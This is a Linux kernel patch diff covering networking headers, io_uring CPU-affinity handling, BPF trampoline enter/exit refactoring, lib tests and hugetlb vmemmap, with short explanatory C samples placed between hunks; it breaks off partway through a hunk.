+index b0d36a9934ccd..5cf6f6f82aa70 100644
+--- a/include/linux/tca6416_keypad.h
++++ b/include/linux/tca6416_keypad.h
+@@ -25,7 +25,6 @@ struct tca6416_keys_platform_data {
+ 	unsigned int rep:1;	/* enable input subsystem auto repeat */
+ 	uint16_t pinmask;
+ 	uint16_t invert;
+-	int irq_is_gpio;
+ 	int use_polling;	/* use polling if Interrupt is not connected*/
+ };
+ #endif
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 1872f570abeda..c286344628dba 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -57,6 +57,7 @@ struct inet_skb_parm {
+ #define IPSKB_FRAG_PMTU		BIT(6)
+ #define IPSKB_L3SLAVE		BIT(7)
+ #define IPSKB_NOPOLICY		BIT(8)
++#define IPSKB_MULTIPATH		BIT(9)
+ 
+ 	u16			frag_max_size;
+ };
+diff --git a/include/net/ip6_fib.h b/include/net/ip6_fib.h
+index 6268963d95994..fa4e6af382e2a 100644
+--- a/include/net/ip6_fib.h
++++ b/include/net/ip6_fib.h
+@@ -472,13 +472,10 @@ void rt6_get_prefsrc(const struct rt6_info *rt, struct in6_addr *addr)
+ 	rcu_read_lock();
+ 
+ 	from = rcu_dereference(rt->from);
+-	if (from) {
++	if (from)
+ 		*addr = from->fib6_prefsrc.addr;
+-	} else {
+-		struct in6_addr in6_zero = {};
+-
+-		*addr = in6_zero;
+-	}
++	else
++		*addr = in6addr_any;
+ 
+ 	rcu_read_unlock();
+ }
+@@ -610,7 +607,10 @@ static inline bool fib6_rules_early_flow_dissect(struct net *net,
+ 	if (!net->ipv6.fib6_rules_require_fldissect)
+ 		return false;
+ 
+-	skb_flow_dissect_flow_keys(skb, flkeys, flag);
++	memset(flkeys, 0, sizeof(*flkeys));
++	__skb_flow_dissect(net, skb, &flow_keys_dissector,
++			   flkeys, NULL, 0, 0, 0, flag);
++
+ 	fl6->fl6_sport = flkeys->ports.src;
+ 	fl6->fl6_dport = flkeys->ports.dst;
+ 	fl6->flowi6_proto = flkeys->basic.ip_proto;
+diff --git a/include/net/ip_fib.h b/include/net/ip_fib.h
+index a378eff827c74..f0c13864180e2 100644
+--- a/include/net/ip_fib.h
++++ b/include/net/ip_fib.h
+@@ -418,7 +418,10 @@ static inline bool fib4_rules_early_flow_dissect(struct net *net,
+ 	if (!net->ipv4.fib_rules_require_fldissect)
+ 		return false;
+ 
+-	skb_flow_dissect_flow_keys(skb, flkeys, flag);
++	memset(flkeys, 0, sizeof(*flkeys));
++	__skb_flow_dissect(net, skb, &flow_keys_dissector,
++			   flkeys, NULL, 0, 0, 0, flag);
++
+ 	fl4->fl4_sport = flkeys->ports.src;
+ 	fl4->fl4_dport = flkeys->ports.dst;
+ 	fl4->flowi4_proto = flkeys->basic.ip_proto;
+diff --git a/include/net/ip_tunnels.h b/include/net/ip_tunnels.h
+index fca3576798166..bca80522f95c8 100644
+--- a/include/net/ip_tunnels.h
++++ b/include/net/ip_tunnels.h
+@@ -473,15 +473,14 @@ static inline void iptunnel_xmit_stats(struct net_device *dev, int pkt_len)
+ 		u64_stats_inc(&tstats->tx_packets);
+ 		u64_stats_update_end(&tstats->syncp);
+ 		put_cpu_ptr(tstats);
++		return;
++	}
++
++	if (pkt_len < 0) {
++		DEV_STATS_INC(dev, tx_errors);
++		DEV_STATS_INC(dev, tx_aborted_errors);
+ 	} else {
+-		struct net_device_stats *err_stats = &dev->stats;
+-
+-		if (pkt_len < 0) {
+-			err_stats->tx_errors++;
+-			err_stats->tx_aborted_errors++;
+-		} else {
+-			err_stats->tx_dropped++;
+-		}
++		DEV_STATS_INC(dev, tx_dropped);
+ 	}
+ }
+ 
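
DEV_STATS_INC() above replaces the plain "dev->stats.tx_errors++" because concurrent transmit failures on different CPUs would otherwise lose increments; the kernel macro wraps an atomic_long_inc(). A stand-in with C11 atomics (the struct and macro here are illustrative, not the netdevice definitions):

#include <stdatomic.h>
#include <stdio.h>

struct dev_stats {
	_Atomic long tx_errors;
	_Atomic long tx_aborted_errors;
	_Atomic long tx_dropped;
};

#define DEV_STATS_INC(s, field) \
	atomic_fetch_add_explicit(&(s)->field, 1, memory_order_relaxed)

static void xmit_stats(struct dev_stats *s, int pkt_len)
{
	if (pkt_len < 0) {
		DEV_STATS_INC(s, tx_errors);
		DEV_STATS_INC(s, tx_aborted_errors);
	} else {
		DEV_STATS_INC(s, tx_dropped);
	}
}

int main(void)
{
	struct dev_stats s = { 0 };

	xmit_stats(&s, -1);
	xmit_stats(&s, 0);
	printf("err=%ld dropped=%ld\n",
	       atomic_load(&s.tx_errors), atomic_load(&s.tx_dropped));
	return 0;
}
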
+diff --git a/include/net/ipv6.h b/include/net/ipv6.h
+index e4ceef687c1c2..517bdae78614b 100644
+--- a/include/net/ipv6.h
++++ b/include/net/ipv6.h
+@@ -750,6 +750,11 @@ static inline bool ipv6_addr_v4mapped(const struct in6_addr *a)
+ 					cpu_to_be32(0x0000ffff))) == 0UL;
+ }
+ 
++static inline bool ipv6_addr_v4mapped_any(const struct in6_addr *a)
++{
++	return ipv6_addr_v4mapped(a) && ipv4_is_zeronet(a->s6_addr32[3]);
++}
++
+ static inline bool ipv6_addr_v4mapped_loopback(const struct in6_addr *a)
+ {
+ 	return ipv6_addr_v4mapped(a) && ipv4_is_loopback(a->s6_addr32[3]);
+@@ -1322,7 +1327,7 @@ static inline int __ip6_sock_set_addr_preferences(struct sock *sk, int val)
+ 	return 0;
+ }
+ 
+-static inline int ip6_sock_set_addr_preferences(struct sock *sk, bool val)
++static inline int ip6_sock_set_addr_preferences(struct sock *sk, int val)
+ {
+ 	int ret;
+ 
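
ipv6_addr_v4mapped_any() in the ipv6.h hunk above matches ::ffff:0.0.0.0, a v4-mapped address whose embedded IPv4 part is INADDR_ANY. The same test in portable userspace, using the libc macro for the mapped prefix:

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int v4mapped_any(const struct in6_addr *a)
{
	uint32_t v4;

	memcpy(&v4, a->s6_addr + 12, sizeof(v4));	/* embedded IPv4 part */
	return IN6_IS_ADDR_V4MAPPED(a) && v4 == htonl(INADDR_ANY);
}

int main(void)
{
	struct in6_addr a;

	inet_pton(AF_INET6, "::ffff:0.0.0.0", &a);
	printf("%d\n", v4mapped_any(&a));	/* 1 */
	inet_pton(AF_INET6, "::ffff:127.0.0.1", &a);
	printf("%d\n", v4mapped_any(&a));	/* 0 */
	return 0;
}
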
+diff --git a/include/net/sock.h b/include/net/sock.h
+index d1f936ed97556..fe695e8bfe289 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1049,6 +1049,12 @@ static inline void sk_wmem_queued_add(struct sock *sk, int val)
+ 	WRITE_ONCE(sk->sk_wmem_queued, sk->sk_wmem_queued + val);
+ }
+ 
++static inline void sk_forward_alloc_add(struct sock *sk, int val)
++{
++	/* Paired with lockless reads of sk->sk_forward_alloc */
++	WRITE_ONCE(sk->sk_forward_alloc, sk->sk_forward_alloc + val);
++}
++
+ void sk_stream_write_space(struct sock *sk);
+ 
+ /* OOB backlog add */
+@@ -1401,7 +1407,7 @@ static inline int sk_forward_alloc_get(const struct sock *sk)
+ 	if (sk->sk_prot->forward_alloc_get)
+ 		return sk->sk_prot->forward_alloc_get(sk);
+ #endif
+-	return sk->sk_forward_alloc;
++	return READ_ONCE(sk->sk_forward_alloc);
+ }
+ 
+ static inline bool __sk_stream_memory_free(const struct sock *sk, int wake)
+@@ -1697,14 +1703,14 @@ static inline void sk_mem_charge(struct sock *sk, int size)
+ {
+ 	if (!sk_has_account(sk))
+ 		return;
+-	sk->sk_forward_alloc -= size;
++	sk_forward_alloc_add(sk, -size);
+ }
+ 
+ static inline void sk_mem_uncharge(struct sock *sk, int size)
+ {
+ 	if (!sk_has_account(sk))
+ 		return;
+-	sk->sk_forward_alloc += size;
++	sk_forward_alloc_add(sk, size);
+ 	sk_mem_reclaim(sk);
+ }
+ 
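
sk_forward_alloc_add() above pairs its WRITE_ONCE() with the READ_ONCE() added to sk_forward_alloc_get(): writers still run under the socket lock, the annotations only make the lockless read well-defined (no torn or repeated loads). A C11 analogue with a relaxed atomic (struct and function names are illustrative):

#include <stdatomic.h>
#include <stdio.h>

struct sock_lite {
	_Atomic int forward_alloc;	/* written under lock, read locklessly */
};

static void forward_alloc_add(struct sock_lite *sk, int val)
{
	/* the caller holds the lock, so the read-modify-write need not be
	 * one atomic op; the relaxed store replaces WRITE_ONCE()
	 */
	int cur = atomic_load_explicit(&sk->forward_alloc, memory_order_relaxed);

	atomic_store_explicit(&sk->forward_alloc, cur + val, memory_order_relaxed);
}

static int forward_alloc_get(struct sock_lite *sk)
{
	/* lockless read path, replaces READ_ONCE() */
	return atomic_load_explicit(&sk->forward_alloc, memory_order_relaxed);
}

int main(void)
{
	struct sock_lite sk = { 0 };

	forward_alloc_add(&sk, 4096);
	forward_alloc_add(&sk, -1024);
	printf("%d\n", forward_alloc_get(&sk)); /* 3072 */
	return 0;
}
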
+diff --git a/include/trace/events/fib.h b/include/trace/events/fib.h
+index c2300c407f583..76297ecd4935c 100644
+--- a/include/trace/events/fib.h
++++ b/include/trace/events/fib.h
+@@ -36,7 +36,6 @@ TRACE_EVENT(fib_table_lookup,
+ 	),
+ 
+ 	TP_fast_assign(
+-		struct in6_addr in6_zero = {};
+ 		struct net_device *dev;
+ 		struct in6_addr *in6;
+ 		__be32 *p32;
+@@ -74,7 +73,7 @@ TRACE_EVENT(fib_table_lookup,
+ 				*p32 = nhc->nhc_gw.ipv4;
+ 
+ 				in6 = (struct in6_addr *)__entry->gw6;
+-				*in6 = in6_zero;
++				*in6 = in6addr_any;
+ 			} else if (nhc->nhc_gw_family == AF_INET6) {
+ 				p32 = (__be32 *) __entry->gw4;
+ 				*p32 = 0;
+@@ -87,7 +86,7 @@ TRACE_EVENT(fib_table_lookup,
+ 			*p32 = 0;
+ 
+ 			in6 = (struct in6_addr *)__entry->gw6;
+-			*in6 = in6_zero;
++			*in6 = in6addr_any;
+ 		}
+ 	),
+ 
+diff --git a/include/trace/events/fib6.h b/include/trace/events/fib6.h
+index 6e821eb794503..4d3e607b3cdec 100644
+--- a/include/trace/events/fib6.h
++++ b/include/trace/events/fib6.h
+@@ -68,11 +68,8 @@ TRACE_EVENT(fib6_table_lookup,
+ 			strcpy(__entry->name, "-");
+ 		}
+ 		if (res->f6i == net->ipv6.fib6_null_entry) {
+-			struct in6_addr in6_zero = {};
+-
+ 			in6 = (struct in6_addr *)__entry->gw;
+-			*in6 = in6_zero;
+-
++			*in6 = in6addr_any;
+ 		} else if (res->nh) {
+ 			in6 = (struct in6_addr *)__entry->gw;
+ 			*in6 = res->nh->fib_nh_gw6;
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 411bb2d1acd45..98ac9dbcec2f5 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -181,6 +181,16 @@ static void io_worker_ref_put(struct io_wq *wq)
+ 		complete(&wq->worker_done);
+ }
+ 
++bool io_wq_worker_stopped(void)
++{
++	struct io_worker *worker = current->worker_private;
++
++	if (WARN_ON_ONCE(!io_wq_current_is_worker()))
++		return true;
++
++	return test_bit(IO_WQ_BIT_EXIT, &worker->wqe->wq->state);
++}
++
+ static void io_worker_cancel_cb(struct io_worker *worker)
+ {
+ 	struct io_wqe_acct *acct = io_wqe_get_acct(worker);
+@@ -1340,13 +1350,16 @@ static int io_wq_cpu_offline(unsigned int cpu, struct hlist_node *node)
+ 	return __io_wq_cpu_online(wq, cpu, false);
+ }
+ 
+-int io_wq_cpu_affinity(struct io_wq *wq, cpumask_var_t mask)
++int io_wq_cpu_affinity(struct io_uring_task *tctx, cpumask_var_t mask)
+ {
+ 	int i;
+ 
++	if (!tctx || !tctx->io_wq)
++		return -EINVAL;
++
+ 	rcu_read_lock();
+ 	for_each_node(i) {
+-		struct io_wqe *wqe = wq->wqes[i];
++		struct io_wqe *wqe = tctx->io_wq->wqes[i];
+ 
+ 		if (mask)
+ 			cpumask_copy(wqe->cpu_mask, mask);
+diff --git a/io_uring/io-wq.h b/io_uring/io-wq.h
+index 31228426d1924..2b2a6406dd8ee 100644
+--- a/io_uring/io-wq.h
++++ b/io_uring/io-wq.h
+@@ -50,8 +50,9 @@ void io_wq_put_and_exit(struct io_wq *wq);
+ void io_wq_enqueue(struct io_wq *wq, struct io_wq_work *work);
+ void io_wq_hash_work(struct io_wq_work *work, void *val);
+ 
+-int io_wq_cpu_affinity(struct io_wq *wq, cpumask_var_t mask);
++int io_wq_cpu_affinity(struct io_uring_task *tctx, cpumask_var_t mask);
+ int io_wq_max_workers(struct io_wq *wq, int *new_count);
++bool io_wq_worker_stopped(void);
+ 
+ static inline bool io_wq_is_hashed(struct io_wq_work *work)
+ {
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 6d455e2428b90..f413ebed81ab3 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1823,6 +1823,8 @@ fail:
+ 		if (!needs_poll) {
+ 			if (!(req->ctx->flags & IORING_SETUP_IOPOLL))
+ 				break;
++			if (io_wq_worker_stopped())
++				break;
+ 			cond_resched();
+ 			continue;
+ 		}
+@@ -3833,16 +3835,28 @@ static int io_register_enable_rings(struct io_ring_ctx *ctx)
+ 	return 0;
+ }
+ 
++static __cold int __io_register_iowq_aff(struct io_ring_ctx *ctx,
++					 cpumask_var_t new_mask)
++{
++	int ret;
++
++	if (!(ctx->flags & IORING_SETUP_SQPOLL)) {
++		ret = io_wq_cpu_affinity(current->io_uring, new_mask);
++	} else {
++		mutex_unlock(&ctx->uring_lock);
++		ret = io_sqpoll_wq_cpu_affinity(ctx, new_mask);
++		mutex_lock(&ctx->uring_lock);
++	}
++
++	return ret;
++}
++
+ static __cold int io_register_iowq_aff(struct io_ring_ctx *ctx,
+ 				       void __user *arg, unsigned len)
+ {
+-	struct io_uring_task *tctx = current->io_uring;
+ 	cpumask_var_t new_mask;
+ 	int ret;
+ 
+-	if (!tctx || !tctx->io_wq)
+-		return -EINVAL;
+-
+ 	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+@@ -3863,19 +3877,14 @@ static __cold int io_register_iowq_aff(struct io_ring_ctx *ctx,
+ 		return -EFAULT;
+ 	}
+ 
+-	ret = io_wq_cpu_affinity(tctx->io_wq, new_mask);
++	ret = __io_register_iowq_aff(ctx, new_mask);
+ 	free_cpumask_var(new_mask);
+ 	return ret;
+ }
+ 
+ static __cold int io_unregister_iowq_aff(struct io_ring_ctx *ctx)
+ {
+-	struct io_uring_task *tctx = current->io_uring;
+-
+-	if (!tctx || !tctx->io_wq)
+-		return -EINVAL;
+-
+-	return io_wq_cpu_affinity(tctx->io_wq, NULL);
++	return __io_register_iowq_aff(ctx, NULL);
+ }
+ 
+ static __cold int io_register_iowq_max_workers(struct io_ring_ctx *ctx,
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 2b44126a876ef..7245218fdbe2b 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1337,12 +1337,12 @@ retry:
+ 		return IOU_OK;
+ 	}
+ 
+-	if (ret >= 0 &&
+-	    io_post_aux_cqe(ctx, req->cqe.user_data, ret, IORING_CQE_F_MORE, false))
++	if (ret < 0)
++		return ret;
++	if (io_post_aux_cqe(ctx, req->cqe.user_data, ret, IORING_CQE_F_MORE, false))
+ 		goto retry;
+ 
+-	io_req_set_res(req, ret, 0);
+-	return (issue_flags & IO_URING_F_MULTISHOT) ? IOU_STOP_MULTISHOT : IOU_OK;
++	return -ECANCELED;
+ }
+ 
+ int io_socket_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 869e1d2a44139..a4084acaff911 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -360,11 +360,12 @@ static void io_apoll_task_func(struct io_kiocb *req, bool *locked)
+ 	if (ret == IOU_POLL_NO_ACTION)
+ 		return;
+ 
++	io_tw_lock(req->ctx, locked);
+ 	io_poll_remove_entries(req);
+ 	io_poll_tw_hash_eject(req, locked);
+ 
+ 	if (ret == IOU_POLL_REMOVE_POLL_USE_RES)
+-		io_req_complete_post(req);
++		io_req_task_complete(req, locked);
+ 	else if (ret == IOU_POLL_DONE || ret == IOU_POLL_REISSUE)
+ 		io_req_task_submit(req, locked);
+ 	else
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 6ffa5cf1bbb86..7b6facf529b8d 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -423,3 +423,20 @@ err:
+ 	io_sq_thread_finish(ctx);
+ 	return ret;
+ }
++
++__cold int io_sqpoll_wq_cpu_affinity(struct io_ring_ctx *ctx,
++				     cpumask_var_t mask)
++{
++	struct io_sq_data *sqd = ctx->sq_data;
++	int ret = -EINVAL;
++
++	if (sqd) {
++		io_sq_thread_park(sqd);
++		/* Don't set affinity for a dying thread */
++		if (sqd->thread)
++			ret = io_wq_cpu_affinity(sqd->thread->io_uring, mask);
++		io_sq_thread_unpark(sqd);
++	}
++
++	return ret;
++}
+diff --git a/io_uring/sqpoll.h b/io_uring/sqpoll.h
+index 0c3fbcd1f583f..36245f1afa5ee 100644
+--- a/io_uring/sqpoll.h
++++ b/io_uring/sqpoll.h
+@@ -27,3 +27,4 @@ void io_sq_thread_park(struct io_sq_data *sqd);
+ void io_sq_thread_unpark(struct io_sq_data *sqd);
+ void io_put_sq_data(struct io_sq_data *sqd);
+ int io_sqpoll_wait_sq(struct io_ring_ctx *ctx);
++int io_sqpoll_wq_cpu_affinity(struct io_ring_ctx *ctx, cpumask_var_t mask);
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 0c44a716f0a24..0c8b7733573ee 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -5135,14 +5135,15 @@ int kern_sys_bpf(int cmd, union bpf_attr *attr, unsigned int size)
+ 		}
+ 
+ 		run_ctx.bpf_cookie = 0;
+-		run_ctx.saved_run_ctx = NULL;
+-		if (!__bpf_prog_enter_sleepable(prog, &run_ctx)) {
++		if (!__bpf_prog_enter_sleepable_recur(prog, &run_ctx)) {
+ 			/* recursion detected */
++			__bpf_prog_exit_sleepable_recur(prog, 0, &run_ctx);
+ 			bpf_prog_put(prog);
+ 			return -EBUSY;
+ 		}
+ 		attr->test.retval = bpf_prog_run(prog, (void *) (long) attr->test.ctx_in);
+-		__bpf_prog_exit_sleepable(prog, 0 /* bpf_prog_run does runtime stats */, &run_ctx);
++		__bpf_prog_exit_sleepable_recur(prog, 0 /* bpf_prog_run does runtime stats */,
++						&run_ctx);
+ 		bpf_prog_put(prog);
+ 		return 0;
+ #endif
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index 30af8f66e17b4..c4381dfcd6b09 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -874,7 +874,7 @@ static __always_inline u64 notrace bpf_prog_start_time(void)
+  * [2..MAX_U64] - execute bpf prog and record execution time.
+  *     This is start time.
+  */
+-u64 notrace __bpf_prog_enter(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx)
++static u64 notrace __bpf_prog_enter_recur(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx)
+ 	__acquires(RCU)
+ {
+ 	rcu_read_lock();
+@@ -911,7 +911,8 @@ static void notrace update_prog_stats(struct bpf_prog *prog,
+ 	}
+ }
+ 
+-void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start, struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit_recur(struct bpf_prog *prog, u64 start,
++					  struct bpf_tramp_run_ctx *run_ctx)
+ 	__releases(RCU)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+@@ -922,8 +923,8 @@ void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start, struct bpf_tramp_
+ 	rcu_read_unlock();
+ }
+ 
+-u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
++					       struct bpf_tramp_run_ctx *run_ctx)
+ 	__acquires(RCU)
+ {
+ 	/* Runtime stats are exported via actual BPF_LSM_CGROUP
+@@ -937,8 +938,8 @@ u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
+ 	return NO_START_TIME;
+ }
+ 
+-void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
++					       struct bpf_tramp_run_ctx *run_ctx)
+ 	__releases(RCU)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+@@ -947,35 +948,57 @@ void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
+ 	rcu_read_unlock();
+ }
+ 
+-u64 notrace __bpf_prog_enter_sleepable(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx)
++u64 notrace __bpf_prog_enter_sleepable_recur(struct bpf_prog *prog,
++					     struct bpf_tramp_run_ctx *run_ctx)
+ {
+ 	rcu_read_lock_trace();
+ 	migrate_disable();
+ 	might_fault();
+ 
++	run_ctx->saved_run_ctx = bpf_set_run_ctx(&run_ctx->run_ctx);
++
+ 	if (unlikely(this_cpu_inc_return(*(prog->active)) != 1)) {
+ 		bpf_prog_inc_misses_counter(prog);
+ 		return 0;
+ 	}
++	return bpf_prog_start_time();
++}
++
++void notrace __bpf_prog_exit_sleepable_recur(struct bpf_prog *prog, u64 start,
++					     struct bpf_tramp_run_ctx *run_ctx)
++{
++	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
++
++	update_prog_stats(prog, start);
++	this_cpu_dec(*(prog->active));
++	migrate_enable();
++	rcu_read_unlock_trace();
++}
++
++static u64 notrace __bpf_prog_enter_sleepable(struct bpf_prog *prog,
++					      struct bpf_tramp_run_ctx *run_ctx)
++{
++	rcu_read_lock_trace();
++	migrate_disable();
++	might_fault();
+ 
+ 	run_ctx->saved_run_ctx = bpf_set_run_ctx(&run_ctx->run_ctx);
+ 
+ 	return bpf_prog_start_time();
+ }
+ 
+-void notrace __bpf_prog_exit_sleepable(struct bpf_prog *prog, u64 start,
+-				       struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit_sleepable(struct bpf_prog *prog, u64 start,
++					      struct bpf_tramp_run_ctx *run_ctx)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+ 
+ 	update_prog_stats(prog, start);
+-	this_cpu_dec(*(prog->active));
+ 	migrate_enable();
+ 	rcu_read_unlock_trace();
+ }
+ 
+-u64 notrace __bpf_prog_enter_struct_ops(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static u64 notrace __bpf_prog_enter(struct bpf_prog *prog,
++				    struct bpf_tramp_run_ctx *run_ctx)
+ 	__acquires(RCU)
+ {
+ 	rcu_read_lock();
+@@ -986,8 +1009,8 @@ u64 notrace __bpf_prog_enter_struct_ops(struct bpf_prog *prog,
+ 	return bpf_prog_start_time();
+ }
+ 
+-void notrace __bpf_prog_exit_struct_ops(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx)
++static void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start,
++				    struct bpf_tramp_run_ctx *run_ctx)
+ 	__releases(RCU)
+ {
+ 	bpf_reset_run_ctx(run_ctx->saved_run_ctx);
+@@ -1007,6 +1030,36 @@ void notrace __bpf_tramp_exit(struct bpf_tramp_image *tr)
+ 	percpu_ref_put(&tr->pcref);
+ }
+ 
++bpf_trampoline_enter_t bpf_trampoline_enter(const struct bpf_prog *prog)
++{
++	bool sleepable = prog->aux->sleepable;
++
++	if (bpf_prog_check_recur(prog))
++		return sleepable ? __bpf_prog_enter_sleepable_recur :
++			__bpf_prog_enter_recur;
++
++	if (resolve_prog_type(prog) == BPF_PROG_TYPE_LSM &&
++	    prog->expected_attach_type == BPF_LSM_CGROUP)
++		return __bpf_prog_enter_lsm_cgroup;
++
++	return sleepable ? __bpf_prog_enter_sleepable : __bpf_prog_enter;
++}
++
++bpf_trampoline_exit_t bpf_trampoline_exit(const struct bpf_prog *prog)
++{
++	bool sleepable = prog->aux->sleepable;
++
++	if (bpf_prog_check_recur(prog))
++		return sleepable ? __bpf_prog_exit_sleepable_recur :
++			__bpf_prog_exit_recur;
++
++	if (resolve_prog_type(prog) == BPF_PROG_TYPE_LSM &&
++	    prog->expected_attach_type == BPF_LSM_CGROUP)
++		return __bpf_prog_exit_lsm_cgroup;
++
++	return sleepable ? __bpf_prog_exit_sleepable : __bpf_prog_exit;
++}
++
+ int __weak
+ arch_prepare_bpf_trampoline(struct bpf_tramp_image *tr, void *image, void *image_end,
+ 			    const struct btf_func_model *m, u32 flags,
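
The trampoline change demotes the per-flavor enter/exit helpers to static functions and adds bpf_trampoline_enter()/bpf_trampoline_exit() to pick the right pair once, based on the program's sleepable and recursion-check properties. A rough sketch of that selection pattern (plain C, illustrative names):

#include <stdbool.h>
#include <stdio.h>

typedef void (*enter_fn)(void);

static void enter_plain(void)           { puts("plain"); }
static void enter_sleepable(void)       { puts("sleepable"); }
static void enter_recur(void)           { puts("recursion-guarded"); }
static void enter_sleepable_recur(void) { puts("sleepable, recursion-guarded"); }

/* Pick one helper at attach time instead of branching on every call. */
static enter_fn select_enter(bool sleepable, bool check_recur)
{
        if (check_recur)
                return sleepable ? enter_sleepable_recur : enter_recur;
        return sleepable ? enter_sleepable : enter_plain;
}

int main(void)
{
        select_enter(true, false)();
        select_enter(false, true)();
        return 0;
}

Choosing the helper once keeps the per-invocation path free of these branches.
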
+diff --git a/lib/idr.c b/lib/idr.c
+index 7ecdfdb5309e7..13f2758c23773 100644
+--- a/lib/idr.c
++++ b/lib/idr.c
+@@ -100,7 +100,7 @@ EXPORT_SYMBOL_GPL(idr_alloc);
+  * @end: The maximum ID (exclusive).
+  * @gfp: Memory allocation flags.
+  *
+- * Allocates an unused ID in the range specified by @nextid and @end.  If
++ * Allocates an unused ID in the range specified by @start and @end.  If
+  * @end is <= 0, it is treated as one larger than %INT_MAX.  This allows
+  * callers to use @start + N as @end as long as N is within integer range.
+  * The search for an unused ID will start at the last ID allocated and will
+diff --git a/lib/kunit/test.c b/lib/kunit/test.c
+index 184df6f701b48..a90bd265d73db 100644
+--- a/lib/kunit/test.c
++++ b/lib/kunit/test.c
+@@ -667,12 +667,13 @@ static int kunit_module_notify(struct notifier_block *nb, unsigned long val,
+ 
+ 	switch (val) {
+ 	case MODULE_STATE_LIVE:
+-		kunit_module_init(mod);
+ 		break;
+ 	case MODULE_STATE_GOING:
+ 		kunit_module_exit(mod);
+ 		break;
+ 	case MODULE_STATE_COMING:
++		kunit_module_init(mod);
++		break;
+ 	case MODULE_STATE_UNFORMED:
+ 		break;
+ 	}
+diff --git a/lib/test_meminit.c b/lib/test_meminit.c
+index 60e1984c060fa..0ae35223d7733 100644
+--- a/lib/test_meminit.c
++++ b/lib/test_meminit.c
+@@ -93,7 +93,7 @@ static int __init test_pages(int *total_failures)
+ 	int failures = 0, num_tests = 0;
+ 	int i;
+ 
+-	for (i = 0; i < 10; i++)
++	for (i = 0; i <= MAX_ORDER; i++)
+ 		num_tests += do_alloc_pages_order(i, &failures);
+ 
+ 	REPORT_FAILURES_IN_FN();
+diff --git a/lib/test_scanf.c b/lib/test_scanf.c
+index b620cf7de5035..a2707af2951ab 100644
+--- a/lib/test_scanf.c
++++ b/lib/test_scanf.c
+@@ -606,7 +606,7 @@ static void __init numbers_slice(void)
+ #define test_number_prefix(T, str, scan_fmt, expect0, expect1, n_args, fn)	\
+ do {										\
+ 	const T expect[2] = { expect0, expect1 };				\
+-	T result[2] = {~expect[0], ~expect[1]};					\
++	T result[2] = { (T)~expect[0], (T)~expect[1] };				\
+ 										\
+ 	_test(fn, &expect, str, scan_fmt, n_args, &result[0], &result[1]);	\
+ } while (0)
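
The test_scanf fix works around C's integer promotions: applying ~ to a type narrower than int yields an int, so initializing a narrow T from ~expect[i] can truncate and trip compiler warnings; the cast restores the intended type. A small demonstration, assuming nothing beyond standard C:

#include <stdio.h>

int main(void)
{
        unsigned short x = 0x1234;

        /* ~x promotes x to int first: the result is a negative int,
         * not an unsigned short. Casting back restores the type.
         */
        printf("~x as int:          %d\n", ~x);
        printf("(unsigned short)~x: %u\n", (unsigned)(unsigned short)~x);
        return 0;
}
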
+diff --git a/mm/hugetlb_vmemmap.c b/mm/hugetlb_vmemmap.c
+index 4962dd1ba4a68..c04214055229b 100644
+--- a/mm/hugetlb_vmemmap.c
++++ b/mm/hugetlb_vmemmap.c
+@@ -36,14 +36,22 @@ struct vmemmap_remap_walk {
+ 	struct list_head	*vmemmap_pages;
+ };
+ 
+-static int __split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
++static int split_vmemmap_huge_pmd(pmd_t *pmd, unsigned long start)
+ {
+ 	pmd_t __pmd;
+ 	int i;
+ 	unsigned long addr = start;
+-	struct page *page = pmd_page(*pmd);
+-	pte_t *pgtable = pte_alloc_one_kernel(&init_mm);
++	struct page *head;
++	pte_t *pgtable;
++
++	spin_lock(&init_mm.page_table_lock);
++	head = pmd_leaf(*pmd) ? pmd_page(*pmd) : NULL;
++	spin_unlock(&init_mm.page_table_lock);
+ 
++	if (!head)
++		return 0;
++
++	pgtable = pte_alloc_one_kernel(&init_mm);
